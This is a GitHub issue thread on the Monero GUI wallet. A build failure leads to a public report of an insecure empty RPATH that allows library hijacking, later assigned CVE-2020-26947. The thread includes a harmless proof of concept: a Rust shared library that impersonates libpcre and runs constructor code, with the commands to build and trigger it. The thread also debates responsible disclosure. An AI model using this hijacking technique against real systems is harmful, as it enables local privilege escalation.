monero-project / monero-gui

Monero: the secure, private, untraceable cryptocurrency
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fatal error: QrCode.hpp: No such file or directory #3142

Closed kpcyrd closed 3 years ago

kpcyrd commented 3 years ago

My build of the latest release failed with an error related to QrCode.hpp:

make: *** No rule to make target 'src/QR-Code-generator/BitBuffer.cpp', needed by 'BitBuffer.o'.  Stop.
make: *** Waiting for unfinished jobs....
Updating '/build/monero-gui/src/monero-gui/build/translations/monero-core_sv.qm'...
Removing translations equal to source text in '/build/monero-gui/src/monero-gui/build/translations/monero-core_sv.qm'...
    Generated 559 translation(s) (559 finished and 0 unfinished)
    Ignored 108 untranslated source text(s)
Updating '/build/monero-gui/src/monero-gui/build/translations/monero-core_uk.qm'...
Removing translations equal to source text in '/build/monero-gui/src/monero-gui/build/translations/monero-core_uk.qm'...
Updating '/build/monero-gui/src/monero-gui/build/translations/monero-core_tr.qm'...
Removing translations equal to source text in '/build/monero-gui/src/monero-gui/build/translations/monero-core_tr.qm'...
Updating '/build/monero-gui/src/monero-gui/build/translations/monero-core_vi.qm'...
Removing translations equal to source text in '/build/monero-gui/src/monero-gui/build/translations/monero-core_vi.qm'...
    Generated 0 translation(s) (0 finished and 0 unfinished)
    Ignored 697 untranslated source text(s)
    Generated 539 translation(s) (539 finished and 0 unfinished)
    Ignored 132 untranslated source text(s)
    Generated 481 translation(s) (481 finished and 0 unfinished)
    Ignored 192 untranslated source text(s)
    Generated 532 translation(s) (532 finished and 0 unfinished)
    Ignored 140 untranslated source text(s)
    Generated 515 translation(s) (515 finished and 0 unfinished)
    Ignored 150 untranslated source text(s)
    Generated 588 translation(s) (588 finished and 0 unfinished)
    Ignored 95 untranslated source text(s)
Updating '/build/monero-gui/src/monero-gui/build/translations/monero-core_zh-tw.qm'...
Removing translations equal to source text in '/build/monero-gui/src/monero-gui/build/translations/monero-core_zh-tw.qm'...
    Generated 545 translation(s) (545 finished and 0 unfinished)
    Ignored 131 untranslated source text(s)
../src/libwalletqt/QRCodeImageProvider.cpp:29:10: fatal error: QrCode.hpp: No such file or directory
   29 | #include "QrCode.hpp"
      |          ^~~~~~~~~~~~
compilation terminated.
Updating '/build/monero-gui/src/monero-gui/build/translations/monero-core_zu.qm'...
Removing translations equal to source text in '/build/monero-gui/src/monero-gui/build/translations/monero-core_zu.qm'...
    Generated 578 translation(s) (578 finished and 0 unfinished)
    Ignored 105 untranslated source text(s)
    Generated 0 translation(s) (0 finished and 0 unfinished)
    Ignored 697 untranslated source text(s)
Updating '/build/monero-gui/src/monero-gui/build/translations/monero-core_zh-cn.qm'...
Removing translations equal to source text in '/build/monero-gui/src/monero-gui/build/translations/monero-core_zh-cn.qm'...
make: *** [Makefile:2200: QRCodeImageProvider.o] Error 1
    Generated 634 translation(s) (634 finished and 0 unfinished)
    Ignored 48 untranslated source text(s)

In the code base I found a reference to src/QR-Code-generator/QrCode.hpp but that file doesn't exist in the repository.

selsta commented 3 years ago

We switched to cmake build system, please see README.

kpcyrd commented 3 years ago

@selsta thanks, I've updated my build to run make release instead of ./ and it worked!

I think there's an issue with the new build system though, the binary got flagged in our build with:

monero-gui E: Insecure RPATH '' in file ('usr/bin/monero-wallet-gui')

There's indeed a static RPATH in the binary:

% objdump -x usr/bin/monero-wallet-gui | grep RPATH
  RPATH                /usr/lib/

The empty string at the end is equivalent to ., which means that when resolving dynamically linked libraries it's going to favor anything in the current directory over /usr/lib.

We can confirm this with ldd:

% pwd
% ldd usr/bin/monero-wallet-gui | grep libc => /usr/lib/ (0x000060b5b6e62000) => /usr/lib/ (0x000060b5b45b3000) => /usr/lib/ (0x000060b5b1b7a000)
% touch /home/user/test/archlinux/
% ldd usr/bin/monero-wallet-gui | grep libc
usr/bin/monero-wallet-gui: error while loading shared libraries: file too short

Luckily this is fairly uncommonly exploited, but could be used for local privilege escalation (similar to dll hijacking on windows) if the current directory is world writable, like /tmp.

I've hacked together a working poc, although I'm not sure it's the most elegant solution. The library I use doesn't matter, the constructor is executed by the dynamic linker during early initialization before the actual main:

% ldd ../archlinux/usr/bin/monero-wallet-gui | grep libpcre => /usr/lib/ (0x000062750307c000) => /usr/lib/ (0x0000627502a37000)
% cat
/* Rust doesn't directly expose __attribute__((constructor)), but this
 * is how GNU implements it.
 * Props to */
pub static INITIALIZE_CTOR: extern fn() = ::hax;

extern fn hax() {
    println!("pew pew!");

// nm -gD /usr/lib/
#[no_mangle] extern fn pcre_assign_jit_stack() {}
#[no_mangle] extern fn pcre_callout() {}
#[no_mangle] extern fn pcre_compile() {}
#[no_mangle] extern fn pcre_compile2() {}
#[no_mangle] extern fn pcre_config() {}
#[no_mangle] extern fn pcre_copy_named_substring() {}
#[no_mangle] extern fn pcre_copy_substring() {}
#[no_mangle] extern fn pcre_dfa_exec() {}
#[no_mangle] extern fn pcre_exec() {}
#[no_mangle] extern fn pcre_free() {}
#[no_mangle] extern fn pcre_free_study() {}
#[no_mangle] extern fn pcre_free_substring() {}
#[no_mangle] extern fn pcre_free_substring_list() {}
#[no_mangle] extern fn pcre_fullinfo() {}
#[no_mangle] extern fn pcre_get_named_substring() {}
#[no_mangle] extern fn pcre_get_stringnumber() {}
#[no_mangle] extern fn pcre_get_stringtable_entries() {}
#[no_mangle] extern fn pcre_get_substring() {}
#[no_mangle] extern fn pcre_get_substring_list() {}
#[no_mangle] extern fn pcre_jit_exec() {}
#[no_mangle] extern fn pcre_jit_free_unused_memory() {}
#[no_mangle] extern fn pcre_jit_stack_alloc() {}
#[no_mangle] extern fn pcre_jit_stack_free() {}
#[no_mangle] extern fn pcre_maketables() {}
#[no_mangle] extern fn pcre_malloc() {}
#[no_mangle] extern fn pcre_pattern_to_host_byte_order() {}
#[no_mangle] extern fn pcre_refcount() {}
#[no_mangle] extern fn pcre_stack_free() {}
#[no_mangle] extern fn pcre_stack_guard() {}
#[no_mangle] extern fn pcre_stack_malloc() {}
#[no_mangle] extern fn pcre_study() {}
#[no_mangle] extern fn pcre_version() {}
% rustc --crate-type cdylib -o
% ldd ../archlinux/usr/bin/monero-wallet-gui | grep libpcre => /usr/lib/ (0x000062214bdfd000) (0x000062214b7e3000)
% ../archlinux/usr/bin/monero-wallet-gui
pew pew!

I assumed I followed the build instructions incorrectly, but the same issue exists in the official binary:

% objdump -x ../official/monero-gui-v0.17.0.1/monero-wallet-gui | grep RPATH
  RPATH                /usr/local/lib/libX11.a:/usr/local/lib/libXext.a:/usr/X11R6/lib64:
% ../official/monero-gui-v0.17.0.1/monero-wallet-gui
pew pew!
kpcyrd commented 3 years ago

This has been assigned CVE-2020-26947.

xiphon commented 3 years ago

You should have followed Monero Vulnerability Response Process ( instead of submitting quite unnecessary CVE (at least at this point).

I find your behavior quite unprofessional.

In case you don't know what responsible disclosure is, see

kpcyrd commented 3 years ago

Sorry, I didn't know there's a bugbounty (obviously, since I passed on a bounty with this report). The severity of this issue is quite low, so I don't think doing all the extra work of coordinated disclosure is reasonable, this is all unpaid volunteer work after all.

selsta commented 3 years ago

3150 should resolve this issue. Thanks for reporting, next time please notify in private to give us time to resolve the issue before submitting a CVE for such a low severity issue.

kpcyrd commented 3 years ago

Thanks! I've uploaded with the patch applied, just in time for the hard fork. :)